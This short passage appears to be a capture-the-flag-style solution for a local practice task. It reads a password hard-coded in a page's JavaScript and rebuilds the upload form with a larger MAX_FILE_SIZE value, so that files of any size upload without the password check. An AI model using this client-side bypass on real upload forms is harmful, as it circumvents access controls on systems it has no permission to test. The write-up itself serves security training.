Notice the line that asks for a password and checks it:
if(prompt('enter a password')=='df9nhfd') return true;
Thus, you'll easily disclose the password necessary to upload files: It is df9nhfd .
Uploading large files is barred by the following form field:
<input type=hidden name=MAX_FILE_SIZE value=10>
To upload a file of any size , save the page on the hard disk and edit its MAX_FILE_SIZE parameter and change or add the action attribute. In addition, you can disable the password check here.
As a result, the file stored on your disk will look as follows .
<html> <body> <form enctype="multipart/form-data" method=POST action=http://localhost/zadachi/l/> <input type=hidden name=MAX_FILE_SIZE value=1000000000> Send this file: <input name=userfile type=file> <input type=submit value="Send File"> </form> </body> </html>
If you open this file in your browser, you'll be able to upload a file of any size without submitting a password.
The task is solved .